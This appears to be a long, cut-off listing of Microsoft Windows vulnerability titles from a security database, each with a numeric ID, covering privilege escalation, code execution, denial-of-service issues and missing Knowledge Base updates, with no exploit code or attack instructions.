Microsoft Windows Knowledge Base Article 2570947 update is not installed [69489] Microsoft Windows components DLL code execution [69215] Microsoft Windows DHCPv6 denial of service [69009] Microsoft Windows Client/Server Run-time Subsystem information disclosure [68840] Microsoft Windows Knowledge Base Article 2451858 update is not installed [68838] Microsoft SharePoint and Windows SharePoint Services cross-site scripting [68837] Microsoft SharePoint and Windows SharePoint Services XML file disclosure [68836] Microsoft SharePoint and Windows SharePoint Services contact details cross-site scripting [68833] Microsoft Windows Knowledge Base Article 2567943 update is not installed [68831] Microsoft Windows Knowledge Base Article 2570222 update is not installed [68830] Microsoft Windows Remote Desktop Protocol denial of service [68829] Microsoft Windows Knowledge Base Article 2567951 update is not installed [68827] Microsoft Windows Knowledge Base Article 2578230 update is not installed [68825] Microsoft Windows Knowledge Base Article 2546250 update is not installed [68824] Microsoft Windows Remote Desktop Web Access privilege escalation [68823] Microsoft Windows Knowledge Base Article 2559049 update is not installed [68816] Microsoft Windows Knowledge Base Article 2556532 update is not installed [68815] Microsoft Windows kernel meta-data denial of service [68814] Microsoft Windows Knowledge Base Article 2560656 update is not installed [68813] Microsoft Windows Data Access code execution [68812] Microsoft Windows Knowledge Base Article 2560978 update is not installed [68809] Microsoft Windows Knowledge Base Article 2562485 update is not installed [68808] Microsoft Windows DNS Server denial of service [68807] Microsoft Windows DNS Server code execution [68806] Microsoft Windows Knowledge Base Article 2566454 update is not installed [68805] Microsoft Windows NDISTAPI privilege escalation [68804] Microsoft Windows Knowledge Base Article 2563894 update is not installed [68803] Microsoft Windows TCP/IP QoS denial of service [68802] Microsoft Windows TCP/IP ICMP denial of service [68801] Microsoft Windows Knowledge Base Article 2567680 update is not installed [68800] Microsoft Windows Client/Server Run-time Subsystem Winsrv.dl privilege escalation [68469] Microsoft Windows GPU denial of service [68467] Microsoft Windows NVIDIA Geforce 310 denial of service [68465] Microsoft Windows Intel G41 denial of service [68315] Microsoft Windows Knowledge Base Article 2555917 update is not installed [68314] Microsoft Windows win32k.sys privilege escalation [68313] Microsoft Windows win32k.sys privilege escalation [68312] Microsoft Windows win32k.sys information disclosure [68311] Microsoft Windows NULL privilege escalation [68310] Microsoft Windows win32k.sys privilege escalation [68309] Microsoft Windows win32k.sys privilege escalation [68308] Microsoft Windows win32k.sys privilege escalation [68307] Microsoft Windows NULL pointer privilege escalation [68306] Microsoft Windows NULL pointer privilege escalation [68305] Microsoft Windows kernel-mode driver privilege escalation [68304] Microsoft Windows kernel-mode driver privilege escalation [68303] Microsoft Windows kernel-mode driver privilege escalation [68302] Microsoft Windows win32k.sys privilege escalation [68301] Microsoft Windows win32k.sys privilege escalation [68300] Microsoft Windows win32k.sys privilege escalation [68299] Microsoft Windows Knowledge Base Article 2566220 update is not installed [68298] Microsoft Windows Bluetooth stack code execution [68283] Microsoft Windows Knowledge Base Article 2560847 update is not installed [68002] Microsoft Windows Media Player klite denial of service [67989] Microsoft Windows tskill privilege escalation [67955] Microsoft Windows Knowledge Base Article 2530548 update is not installed [67943] Microsoft Windows Knowledge Base Article 2544521 update is not installed [67942] Microsoft Windows Vector Markup Language (VML) code execution [67795] Microsoft Windows Live Messenger dwmapi.dll code execution [67762] Microsoft Windows Knowledge Base Article 2543893 update is not installed [67759] Microsoft Windows Knowledge Base Article 2544893 update is not installed [67758] Microsoft Windows MHTML information disclosure [67757] Microsoft Windows Knowledge Base Article 2476490 update is not installed [67756] Microsoft Windows Object Linking and Embedding WMF code execution [67755] Microsoft Windows Knowledge Base Article 2503665 update is not installed [67754] Microsoft Windows Ancillary Function Driver privilege escalation [67753] Microsoft Windows Knowledge Base Article 2514842 update is not installed [67751] Microsoft Windows Knowledge Base Article 2518295 update is not installed [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [67749] Microsoft Windows Knowledge Base Article 2507938 update is not installed [67748] Microsoft Windows SrvWriteConsoleOutputString privilege escalation [67747] Microsoft Windows SrvWriteConsoleOutput privilege escalation [67746] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand privilege escalation [67745] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC privilege escalation [67744] Microsoft Windows CSRSS AllocConsole privilege escalation [67737] Microsoft Windows Knowledge Base Article 2520426 update is not installed [67733] Microsoft Windows Knowledge Base Article 2525694 update is not installed [67732] Microsoft Windows Win32k OTF code execution [67731] Microsoft Windows Knowledge Base Article 2525835 update is not installed [67730] Microsoft Windows Server Hyper-V VMBus denial of service [67728] Microsoft Windows Knowledge Base Article 2535512 update is not installed [67727] Microsoft Windows DFS denial of service [67726] Microsoft Windows DFS code execution [67725] Microsoft Windows Knowledge Base Article 2536275 update is not installed [67724] Microsoft Windows SMB request denial of service [67722] Microsoft Windows Knowledge Base Article 2536276 update is not installed [67721] Microsoft Windows SMB responses code execution [67718] Microsoft Windows Knowledge Base Article 2537146 update is not installed [67709] Microsoft Windows Knowledge Base Article 2538814 update is not installed [67520] Microsoft Windows Vista nsiproxy.sys denial of service [67302] Microsoft Windows Knowledge Base Article 2545814 update is not installed [67101] Microsoft Windows Knowledge Base Article 2524426 update is not installed [67100] Microsoft Windows Windows Internet Name Service code execution [66856] Microsoft Windows Media Player .avi buffer overflow [66855] Microsoft Windows Media Player .ogg denial of service [66845] Microsoft Windows Knowledge Base Article 2506014 update is not installed [66844] Microsoft Windows Knowledge Base Article 2501584 update is not installed [66835] Microsoft Windows and Internet Explorer msxml.dll information disclosure [66639] Microsoft Windows XP afd.sys denial of service [66469] Microsoft Windows Explorer Shmedia.dll denial of service [66448] Microsoft Windows Knowledge Base Article 2508272 update is not installed [66447] Microsoft Windows Messenger ActiveX control code execution [66446] Microsoft Windows Knowledge Base Article 2514666 update is not installed [66445] Microsoft Windows VBScript and Jscript code execution [66444] Microsoft Windows Knowledge Base Article 2511455 update is not installed [66443] Microsoft Windows SMB response code execution [66442] Microsoft Windows Knowledge Base Article 2509553 update is not installed [66441] Microsoft Windows DNS resolution code execution [66440] Microsoft Windows Knowledge Base Article 2508429 update is not installed [66439] Microsoft Windows SMB protocol code execution [66438] Microsoft Windows Knowledge Base Article 2507618 update is not installed [66437] Microsoft Windows OpenType buffer overflow [66436] Microsoft Windows Knowledge Base Article 2497640 update is not installed [66432] Microsoft Windows Knowledge Base Article 2527308 update is not installed [66431] Microsoft Windows Fax Cover Page Editor code execution [66430] Microsoft Windows Knowledge Base Article 2503658 update is not installed [66428] Microsoft Windows Knowledge Base Article 2489979 update is not installed [66427] Microsoft Windows GDI+ EMF code execution [66425] Microsoft Windows Knowledge Base Article 2506223 update is not installed [66424] Microsoft Windows kernel-mode driver (win32k.sys) variant 30 privilege escalation [66423] Microsoft Windows kernel-mode driver (win32k.sys) variant 29 privilege escalation [66422] Microsoft Windows kernel-mode driver (win32k.sys) variant 28 privilege escalation [66421] Microsoft Windows kernel-mode driver (win32k.sys) variant 27 privilege escalation [66420] Microsoft Windows kernel-mode driver (win32k.sys) variant 26 privilege escalation [66419] Microsoft Windows kernel-mode driver (win32k.sys) variant 25 privilege escalation [66418] Microsoft Windows kernel-mode driver (win32k.sys) variant 24 privilege escalation [66417] Microsoft Windows kernel-mode driver (win32k.sys) variant 23 privilege escalation [66416] Microsoft Windows kernel-mode driver (win32k.sys) variant 22 privilege escalation [66415] Microsoft Windows kernel-mode driver (win32k.sys) variant 21 privilege escalation [66414] Microsoft Windows kernel-mode driver (win32k.sys) variant 20 privilege escalation [66413] Microsoft Windows kernel-mode driver (win32k.sys) variant 19 privilege escalation [66412] Microsoft Windows kernel-mode driver (win32k.sys) variant 18 privilege escalation [66411] Microsoft Windows kernel-mode driver (win32k.sys) variant 17 privilege escalation [66410] Microsoft Windows kernel-mode driver (win32k.sys) variant 16 privilege escalation [66409] Microsoft Windows kernel-mode driver (win32k.sys) variant 15 privilege escalation [66408] Microsoft Windows kernel-mode driver (win32k.sys) variant 14 privilege escalation [66407] Microsoft Windows kernel-mode driver (win32k.sys) variant 13 privilege escalation [66406] Microsoft Windows kernel-mode driver (win32k.sys) variant 12 privilege escalation [66405] Microsoft Windows kernel-mode driver (win32k.sys) variant 11 privilege escalation [66404] Microsoft Windows kernel-mode driver (win32k.sys) variant 10 privilege escalation [66403] Microsoft Windows kernel-mode driver (win32k.sys) variant 9 privilege escalation [66402] Microsoft Windows kernel-mode driver (win32k.sys) variant 8 privilege escalation [66401] Microsoft Windows kernel-mode driver (win32k.sys) variant 7 privilege escalation [66400] Microsoft Windows kernel-mode driver (win32k.sys) variant 6 privilege escalation [66399] Microsoft Windows kernel-mode driver (win32k.sys) variant 5 privilege escalation [66398] Microsoft Windows kernel-mode driver (win32k.sys) variant 4 privilege escalation [66397] Microsoft Windows kernel-mode driver (win32k.sys) variant 3 privilege escalation [66396] Microsoft Windows kernel-mode driver (win32k.sys) variant 2 privilege escalation [66395] Microsoft Windows kernel-mode driver (win32k.sys) variant 1 privilege escalation [66394] Microsoft Windows Knowledge Base Article 2485663 update is not installed [66312] Microsoft Windows Media Player .ape buffer overflow [66254] Microsoft Windows certificates spoofing [65972] Microsoft Windows mscorsvw.exe privilege escalation [65588] Microsoft Windows Knowledge Base Article 2489279 update is not installed [65581] Microsoft Windows Knowledge Base Article 2510030 update is not installed [65580] Microsoft Windows Knowledge Base Article 2489283 update is not installed [65575] Microsoft Windows Knowledge Base Article 2489293 update is not installed [65573] Microsoft Windows Knowledge Base Article 2494047 update is not installed [65570] Microsoft Windows Knowledge Base Article 2500212 update is not installed [65568] Microsoft Windows Knowledge Base Article 2508062 update is not installed [65567] Microsoft Windows RDC code execution [65495] Microsoft Windows HID weak security [65383] Microsoft Windows Graphics Rendering Engine height integer overflow [65382] Microsoft Windows Graphics Rendering Engine BMP integer overflow [65381] Microsoft Windows Graphics Rendering Engine biCompression buffer overflow [65376] Microsoft Windows Server CIFS code execution [65169] Microsoft Windows Azure information disclosure [65000] Microsoft Windows MHTML information disclosure [64973] Microsoft Windows Knowledge Base Article 2478960 update is not installed [64972] Microsoft Windows LSASS privilege escalation [64971] Microsoft Windows Knowledge Base Article 2479628 update is not installed [64970] Microsoft Windows Win32k.sys privilege escalation [64969] Microsoft Windows classpointer privilege escalation [64968] Microsoft Windows pointer privilege escalation [64967] Microsoft Windows Win32k.sys privilege escalation [64966] Microsoft Windows Win32k.sys privilege escalation [64927] Microsoft Windows Knowledge Base Article 2393802 update is not installed [64926] Microsoft Windows kernel privilege escalation [64925] Microsoft Windows Knowledge Base Article 2451879 update is not installed [64921] Microsoft Windows Media Player and Windows Media Center DVR-MS code execution [64920] Microsoft Windows Knowledge Base Article 2475792 update is not installed [64919] Microsoft Windows VBScript and JScript information disclosure [64918] Microsoft Windows Knowledge Base Article 2476687 update is not installed [64917] Microsoft Windows CSRSS privilege escalation [64916] Microsoft Windows Knowledge Base Article 2478953 update is not installed [64915] Microsoft Windows Active Directory denial of service [64914] Microsoft Windows Knowledge Base Article 2482017 update is not installed [64910] Microsoft Windows Knowledge Base Article 2483185 update is not installed [64909] Microsoft Windows Knowledge Base Article 2484015 update is not installed [64907] Microsoft Windows Knowledge Base Article 2485376 update is not installed [64906] Microsoft Windows OpenType Compact Font Format code execution [64905] Microsoft Windows Knowledge Base Article 2489256 update is not installed [64902] Microsoft Windows Knowledge Base Article 2496930 update is not installed [64901] Microsoft Windows Kerberos spoofing [64900] Microsoft Windows Kerberos checksum privilege escalation [64837] Microsoft Windows Fax Cover Page Editor code execution [64583] Microsoft Windows Neighbor Discovery (ND) protocol denial of service [64474] Microsoft Windows Remote Access Phonebook code execution [64446] Microsoft Windows Contacts DLL code execution [64382] Microsoft Windows Graphics Rendering Engine buffer overflow [64342] Microsoft Windows Knowledge Base Article 2451910 update is not installed [64339] Microsoft Windows Knowledge Base Article 2478935 update is not installed [64307] Microsoft Windows Windows Fax Cover Page Editor component buffer overflow [63909] Microsoft Windows dynamic-linked library (oci.dll) code execution [63816] Microsoft Windows Media Encoder 9 dynamic-linked library (DLL) code execution [63807] Microsoft Windows Mail dynamic-linked library (wab32res.dll) code execution [63803] Microsoft Windows Live Messenger dynamic-linked library (msgsres.dll) code execution [63788] Microsoft Windows Backup dynamic-linked library (fveapi.dll) code execution [63787] Microsoft Windows Internet Communication Settings dynamic-linked library (schannel.dll) code execution [63779] Microsoft Windows Indeo Filter dynamic-linked library (iacenc.dll) code execution [63776] Microsoft Windows Program Group Converter dynamic-linked library (DLL) code execution [63773] Microsoft Windows Address Book dynamic-linked library (wab32res.dll) code execution [63586] Microsoft Windows Knowledge Base Article 2207559 update is not installed [63585] Microsoft Windows Netlogon denial of service [63584] Microsoft Windows Knowledge Base Article 2424434 update is not installed [63583] Microsoft Windows Movie Maker insecure library loading code execution [63582] Microsoft Windows Knowledge Base Article 2423089 update is not installed [63580] Microsoft Windows Knowledge Base Article 2436673 update is not installed [63579] Microsoft Windows user mode privilege escalation [63578] Microsoft Windows cursor privilege escalation [63577] Microsoft Windows WriteAV privilege escalation [63576] Microsoft Windows pointer privilege escalation [63575] Microsoft Windows double free privilege escalation [63574] Microsoft Windows kernel-mode drivers buffer overflow [63573] Microsoft Windows Knowledge Base Article 2407132 update is not installed [63571] Microsoft Windows Knowledge Base Article 2440591 update is not installed [63570] Microsoft Windows NDProxy buffer overflow [63569] Microsoft Windows Knowledge Base Article 2385678 update is not installed [63568] Microsoft Windows BranchCache code execution [63566] Microsoft Windows Knowledge Base Article 2442962 update is not installed [63565] Microsoft Windows Consent User Interface privilege escalation [63564] Microsoft Windows Knowledge Base Article 2345316 update is not installed [63563] Microsoft Windows Server Hyper-V VMBus denial of service [63562] Microsoft Windows Knowledge Base Article 2296199 update is not installed [63561] Microsoft Windows OpenType Font (OTF) CMAP code execution [63560] Microsoft Windows OpenType Font (OTF) format driver code execution [63559] Microsoft Windows OpenType Font (OTF) format driver code execution [63558] Microsoft Windows Knowledge Base Article 2416400 update is not installed [63550] Microsoft Windows Knowledge Base Article 2447961 update is not installed [63549] Microsoft Windows Media Encoder code execution [63548] Microsoft Windows Knowledge Base Article 2443105 update is not installed [63547] Microsoft Windows Internet Signup code execution [63546] Microsoft Windows Knowledge Base Article 2455005 update is not installed [63544] Microsoft Windows Knowledge Base Article 2292970 update is not installed [63538] Microsoft Windows Knowledge Base Article 968095 update is not installed [63450] Microsoft Windows REG_BINARY privilege escalation [62805] Microsoft Windows Knowledge Base Article 2316074 update is not installed [62797] Microsoft Windows Knowledge Base Article 2305420 update is not installed [62796] Microsoft Windows Task Scheduler privilege escalation [62793] Microsoft Windows Knowledge Base Article 2293386 update is not installed [62789] Microsoft Windows Knowledge Base Article 2423930 update is not installed [62737] Microsoft WindowsTask Scheduler service privilege escalation [62716] Microsoft Windows Mobile .vcf denial of service [62643] Microsoft Windows unspecified privilege escalation [62642] Microsoft Windows unspecified privilege escalation [62170] Microsoft Windows Knowledge Base Article 2296011 update is not installed [62169] Microsoft Windows Explorer buffer overflow [62166] Microsoft Windows Knowledge Base Article 2294255 update is not installed [62165] Microsoft Windows Failover Cluster Manager insecure permissions [62163] Microsoft Windows Knowledge Base Article 2281679 update is not installed [62162] Microsoft Windows Media Player RTSP code execution [62154] Microsoft Windows Knowledge Base Article 2279986 update is not installed [62153] Microsoft Windows OpenType Font fonts privilege escalation [62152] Microsoft Windows OpenType Font privilege escalation [62149] Microsoft Windows Knowledge Base Article 2207566 update is not installed [62148] Microsoft Windows SChannel denial of service [62147] Microsoft Windows Knowledge Base Article 2160841 update is not installed [62143] Microsoft Windows Knowledge Base Article 982132 update is not installed [62142] Microsoft Windows OpenType table code execution [62138] Microsoft Windows Knowledge Base Article 981957 update is not installed [62137] Microsoft Windows class privilege escalation [62135] Microsoft Windows keyboard privilege escalation [62134] Microsoft Windows Knowledge Base Article 2412048 update is not installed [62133] Microsoft Windows Knowledge Base Article 2405882 update is not installed [62129] Microsoft Windows Knowledge Base Article 2387149 update is not installed [62126] Microsoft Windows Knowledge Base Article 2378111 update is not installed [62125] Microsoft Windows Media Player code execution [62123] Microsoft Windows Knowledge Base Article 2360937 update is not installed [62118] Microsoft Windows Knowledge Base Article 2293211 update is not installed [62104] Microsoft Windows Knowledge Base Article 2360131 update is not installed [62103] Microsoft Windows LPC message privilege escalation [62098] Microsoft Windows Knowledge Base Article 2293194 update is not installed [62069] Microsoft Windows Knowledge Base Article 2418042 update is not installed [62006] Microsoft Windows unspecified privilege escalation [61994] Microsoft Windows MPEG Layer-3 Audio Decoder denial of service [61519] Microsoft Windows Knowledge Base Article 2121546 update is not installed [61518] Microsoft Windows CSRSS privilege escalation [61517] Microsoft Windows Knowledge Base Article 2259922 update is not installed [61514] Microsoft Windows Knowledge Base Article 2267960 update is not installed [61510] Microsoft Windows Knowledge Base Article 2315011 update is not installed [61507] Microsoft Windows Knowledge Base Article 2320113 update is not installed [61506] Microsoft Windows Unicode Scripts Processor code execution [61504] Microsoft Windows Knowledge Base Article 2347290 update is not installed [61503] Microsoft Windows Print Spooler service code execution [61501] Microsoft Windows Knowledge Base Article 975558 update is not installed [61500] Microsoft Windows MPEG-4 code execution [61499] Microsoft Windows Knowledge Base Article 982802 update is not installed [61498] Microsoft Windows RPC code execution [61258] Microsoft Windows IcmpSendEcho2Ex denial of service [61187] Microsoft Windows xxxRealDrawMenuItem() privilege escalation [61184] Microsoft Windows win32k!GreStretchBltInternal() denial of service [61129] Microsoft Windows Kerberos security bypass [60975] Microsoft Windows CreateDIBPalette() buffer overflow [60736] Microsoft Windows Knowledge Base Article 2265906 update is not installed [60734] Microsoft Windows Knowledge Base Article 2269638 update is not installed [60728] Microsoft Windows Knowledge Base Article 2269707 update is not installed [60724] Microsoft Windows Knowledge Base Article 2286198 update is not installed [60723] Microsoft Windows Knowledge Base Article 978886 update is not installed [60722] Microsoft Windows TCP/IP input buffer privilege escalation [60721] Microsoft WindowsTCP/IP IPv6 denial of service [60719] Microsoft Windows Knowledge Base Article 980436 update is not installed [60718] Microsoft Windows SChannel code execution [60713] Microsoft Windows Knowledge Base Article 2183461 update is not installed [60705] Microsoft Windows Knowledge Base Article 981852 update is not installed [60704] Microsoft Windows kernel ACL denial of service [60703] Microsoft Windows kernel errors privilege escalation [60702] Microsoft Windows kernel threads privilege escalation [60701] Microsoft Windows Knowledge Base Article 981997 update is not installed [60700] Microsoft Windows Movie Maker code execution [60698] Microsoft Windows Knowledge Base Article 2160329 update is not installed [60697] Microsoft Windows kernel-mode drivers window privilege escalation [60696] Microsoft Windows kernel-mode drivers input privilege escalation [60695] Microsoft Windows kernel-mode drivers memory privilege escalation [60694] Microsoft Windows kernel-mode drivers exception privilege escalation [60693] Microsoft Windows kernel-mode drivers denial of service [60692] Microsoft Windows Knowledge Base Article 982214 update is not installed [60691] Microsoft Windows SMB stack denial of service [60690] Microsoft Windows SMB variable denial of service [60689] Microsoft Windows SMB pool code execution [60688] Microsoft Windows Knowledge Base Article 982665 update is not installed [60687] Microsoft Windows Cinepak Codec code execution [60686] Microsoft Windows Knowledge Base Article 2115168 update is not installed [60685] Microsoft Windows MPEG Layer-3 Codecs code execution [60684] Microsoft Windows Knowledge Base Article 2079403 update is not installed [60683] Microsoft Windows XML Core Services (MSXML) code execution [60682] Microsoft Windows Knowledge Base Article 982799 update is not installed [60681] Microsoft Windows Tracing Feature privilege escalation [60680] Microsoft Windows Knowledge Base Article 2264072 update is not installed [60679] Microsoft Windows registry key ACL privilege escalation [60678] Microsoft Windows Service Isolation privilege escalation [60677] Microsoft Windows Knowledge Base Article 983539 update is not installed [60676] Microsoft Windows LSASS privilege escalation [60422] Microsoft Windows .lnk file code execution [60120] Microsoft Windows NtUserCheckAccessForIntegrityLevel() privilege escalation [60095] Microsoft Windows UpdateFrameTitleForDocument() buffer overflow [59901] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59898] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59895] Microsoft Windows Knowledge Base Article 978212 update is not installed [59891] Microsoft Windows Knowledge Base Article 982335 update is not installed [59447] Microsoft Windows Help and Support Center GetServerName cross-site scripting [59267] Microsoft Windows helpctr.exe command execution [58944] Microsoft Windows Knowledge Base Article 979902 update not installed [58943] Microsoft Windows MJPEG code execution [58942] Microsoft Windows media files code execution [58913] Microsoft Windows Knowledge Base Article 2027452 update is not installed [58891] Microsoft Windows Knowledge Base Article 2028554 update is not installed [58887] Microsoft Windows kernel-mode drivers TrueType privilege escalation [58885] Microsoft Windows Knowledge Base Article 980218 update is not installed [58884] Microsoft Windows OpenType Compact Font Format privilege escalation [58883] Microsoft Windows Knowledge Base Article 981343 update is not installed [58871] Microsoft Windows Knowledge Base Article 982381 update is not installed [58865] Microsoft Windows Knowledge Base Article 982666 update is not installed [58863] Microsoft Windows Knowledge Base Article 983235 update is not installed [58622] Microsoft Windows Canonical Display Driver (cdd.dll) code execution [58345] Microsoft Windows SMTP Service query id spoofing [58344] Microsoft Windows SMTP Service DNS spoofing [58243] Microsoft Office SharePoint Server and Microsoft Windows SharePoint Services help.aspx cross-site scripting [58173] Microsoft Windows Knowledge Base Article 978542 update is not installed [58172] Microsoft Outlook Express and Windows Mail client integer overflow [58171] Microsoft Windows Knowledge Base Article 978213 update is not installed [58060] Microsoft Windows SfnINSTRING() privilege escalation [58059] Microsoft Windows SfnLOGONNOTIFY() denial of service [57601] Microsoft Windows kernel exceptions denial of service [57600] Microsoft Windows kernel image file denial of service [57599] Microsoft Windows kernel path denial of service [57597] Microsoft Windows kernel registry keys denial of service [57596] Microsoft Windows kernel symbolic links denial of service [57595] Microsoft Windows kernel registry keys denial of service [57580] Microsoft Windows Knowledge Base Article 981210 update is not installed [57579] Microsoft Windows Cabinet File Viewer (cabview.dll) code execution [57578] Microsoft Windows WinVerifyTrust signature validation code execution [57380] Microsoft Windows Knowledge Base Article 979683 update is not installed [57379] Microsoft Windows kernel symbolic link privilege escalation [57378] Microsoft Windows kernel memory privilege escalation [57377] Microsoft Windows Knowledge Base Article 979559 update is not installed [57376] Microsoft Windows kernel-mode drivers windows privilege escalation [57375] Microsoft Windows kernel-mode drivers objects privilege escalation [57374] Microsoft Windows Knowledge Base Article 977816 update is not installed [57372] Microsoft Windows Knowledge Base Article 978338 update is not installed [57370] Microsoft Windows ISATAP IPv6 spoofing [57343] Microsoft Windows Knowledge Base Article 979402 update is not installed [57342] Microsoft Windows Media Player ActiveX control code execution [57341] Microsoft Windows Knowledge Base Article 980094 update is not installed [57337] Microsoft Windows Knowledge Base Article 980195 update is not installed [57336] Microsoft Windows Knowledge Base Article 980232 update is not installed [57335] Microsoft Windows SMB message code execution [57334] Microsoft Windows SMB transaction responses code execution [57333] Microsoft Windows SMB code execution [57332] Microsoft Windows SMB memory privilege escalation [57330] Microsoft Windows Knowledge Base Article 980858 update is not installed [57329] Microsoft Windows Media Services info packets buffer overflow [57328] Microsoft Windows Knowledge Base Article 981160 update is not installed [57326] Microsoft Windows Knowledge Base Article 981169 update is not installed [57325] Microsoft Windows Knowledge Base Article 981832 update is not installed [57324] Microsoft Windows SMTP Service Simple Mail Transfer Protocol memory information disclosure [57323] Microsoft Windows SMTP Service and Microsoft Exchange SMTP DNS Mail Exchanger (MX) denial of service [57322] Microsoft Windows Knowledge Base Article 980182 update is not installed [57205] Microsoft Windows Media Player .AVI code execution [56853] Microsoft Windows MS HTML Help ActiveX control (hhctrl.ocx) HtmlHelpA() code execution [56756] Microsoft Windows .ani file denial of service [56591] Microsoft Windows API denial of service [56560] Microsoft Windows winhlp32.exe buffer overflow [56558] Microsoft Windows MsgBox() code execution [56470] Microsoft Windows Knowledge Base Article 980150 update is not installed [56461] Microsoft Windows Knowledge Base Article 975561 update is not installed [56435] Microsoft Windows Media Player .mpg denial of service [56218] Microsoft Windows DNS weak security [55935] Microsoft Windows Knowledge Base Article 975713 update is not installed [55934] Microsoft Windows Knowledge Base Article 978037 update is not installed [55933] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) privilege escalation [55932] Microsoft Windows Knowledge Base Article 978214 update is not installed [55930] Microsoft Windows Knowledge Base Article 977935 update is not installed [55928] Microsoft Windows Knowledge Base Article 978706 update is not installed [55926] Microsoft Windows Knowledge Base Article 977894 update is not installed [55925] Microsoft Windows Hyper-V instruction set denial of service [55924] Microsoft Windows Knowledge Base Article 977377 update is not installed [55923] Microsoft Windows Knowledge Base Article 977290 update is not installed [55922] Microsoft Windows Kerberos Ticket-Granting-Ticket (TGT) denial of service [55921] Microsoft Windows Knowledge Base Article 977165 update is not installed [55920] Microsoft Windows kernel privilege escalation [55917] Microsoft Windows Knowledge Base Article 978262 update is not installed [55910] Microsoft Windows Knowledge Base Article 971468 update is not installed [55909] Microsoft Windows SMB NTLM privilege escalation [55908] Microsoft Windows SMB NULL denial of service [55907] Microsoft Windows SMB denial of service [55906] Microsoft Windows SMB pathname code execution [55898] Microsoft Windows Knowledge Base Article 974145 update is not installed [55897] Microsoft Windows TCP/IP SACK denial of service [55896] Microsoft Windows TCP/IP Route Information code execution [55895] Microsoft Windows TCP/IP stack datagram code execution [55894] Microsoft Windows TCP/IP ICMPv6 code execution [55890] Microsoft Windows Knowledge Base Article 975416 update is not installed [55779] Microsoft Windows Knowledge Base Article 978207 update is not installed [55742] Microsoft Windows #GP trap handler privilege escalation [55680] Microsoft Windows Media Player ActiveX control code execution [55560] Microsoft Windows XP Flash Player code execution [55153] Microsoft Windows Knowledge Base Article 978251 update is not installed [55152] Microsoft Windows Server Message Block client code execution [55151] Microsoft Windows Server Message Block pool code execution [55150] Microsoft Windows Knowledge Base Article 972270 update is not installed [55149] Microsoft Windows EOT font buffer overflow [54645] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54644] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54643] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54642] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54445] Microsoft Windows Knowledge Base Article 975539 update is not installed [54443] Microsoft Windows Knowledge Base Article 974392 update is not installed [54442] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [54440] Microsoft Windows Knowledge Base Article 974318 update is not installed [54439] Microsoft Windows Internet Authentication Service (IAS) privilege escalation [54438] Microsoft Windows Internet Authentication Service (IAS) code execution [54427] Microsoft Windows Knowledge Base Article 971726 update is not installed [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [54424] Microsoft Windows Knowledge Base Article 967183 update is not installed [54422] Microsoft Windows Knowledge Base Article 976325 update is not installed [54217] Microsoft Windows KeAccumulateTicks() denial of service [54012] Microsoft Windows Knowledge Base Article 972652 update is not installed [53991] Microsoft Windows Knowledge Base Article 973309 update is not installed [53990] Microsoft Windows ADAM LDAP denial of service [53986] Microsoft Windows Knowledge Base Article 973565 update is not installed [53985] Microsoft Windows WSDAPI code execution [53981] Microsoft Windows Knowledge Base Article 974783 update is not installed [53980] Microsoft Windows 2000 License Logging Server buffer overflow [53977] Microsoft Windows Knowledge Base Article 976307 update is not installed [53975] Microsoft Windows Knowledge Base Article 969947 update is not installed [53974] Microsoft Windows kernel font code execution [53973] Microsoft Windows kernel GDI privilege escalation [53972] Microsoft Windows kernel NULL pointer privilege escalation [53551] Microsoft Windows Knowledge Base Article KB973525 update is not installed [53550] Microsoft Windows Knowledge Base Article 974112 update is not installed [53549] Microsoft Windows Media Player ASF file buffer overflow [53548] Microsoft Windows Knowledge Base Article 971486 update is not installed [53547] Microsoft Windows kernel exception handler denial of service [53546] Microsoft Windows kernel user mode privilege escalation [53545] Microsoft Windows kernel 64-bit truncation privilege escalation [53544] Microsoft Windows Knowledge Base Article 974455 update is not installed [53541] Microsoft Windows Knowledge Base Article 969059 update is not installed [53540] Microsoft Windows Indexing Service ActiveX control code execution [53537] Microsoft Windows Knowledge Base Article 974571 update is not installed [53536] Microsoft Windows CryptoAPI ASN.1 spoofing [53535] Microsoft Windows CryptoAPI NULL spoofing [53534] Microsoft Windows Knowledge Base Article 975254 update is not installed [53533] Microsoft Windows Knowledge Base Article 957488 update is not installed [53531] Microsoft Windows GDI+ Microsoft Office file code execution [53530] Microsoft Windows GDI+ PNG image code execution [53529] Microsoft Windows GDI+ .NET Framework API code execution [53528] Microsoft Windows GDI+ TIFF image code execution [53527] Microsoft Windows GDI+ TIFF image buffer overflow [53526] Microsoft Windows GDI+ PNG image buffer overflow [53525] Microsoft Windows GDI+ WMF image code execution [53522] Microsoft Windows Knowledge Base Article 975517 update is not installed [53517] Microsoft Windows Knowledge Base Article 975682 update is not installed [53516] Microsoft Windows Media Player audio files code execution [53514] Microsoft Windows Media Player ASF code execution [53512] Microsoft Windows Knowledge Base Article 975467 update is not installed [53511] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [53090] Microsoft Windows srv2.sys code execution [52948] Microsoft Windows Knowledge Base Article 973965 update is not installed [52775] Microsoft Windows Knowledge Base Article 973812 update is not installed [52774] Microsoft Windows Media Format MP3 files code execution [52773] Microsoft Windows Media Format ASF files code execution [52771] Microsoft Windows Knowledge Base Article 971961 update is not installed [52770] Microsoft Windows Jscript code execution [52403] Microsoft Windows OpenType font engine denial of service [52137] Microsoft Windows Knowledge Base Article 969706 update is not installed [52131] Microsoft Windows Knowledge Base Article 972260 update is not installed [52128] Microsoft Windows Knowledge Base Article 967723 update is not installed [52127] Microsoft Windows TCP/IP orphaned connections denial of service [52126] Microsoft Windows TCP/IP timestamps code execution [52117] Microsoft Windows Knowledge Base Article 970927 update is not installed [52116] Microsoft Windows RDP Services Client ActiveX control buffer overflow [52115] Microsoft Windows Remote Desktop Connection RDP buffer overflow [52114] Microsoft Windows Knowledge Base Article 970957 update is not installed [52113] ASP.NET Framework component of Microsoft Windows HTTP denial of service [52111] Microsoft Windows Knowledge 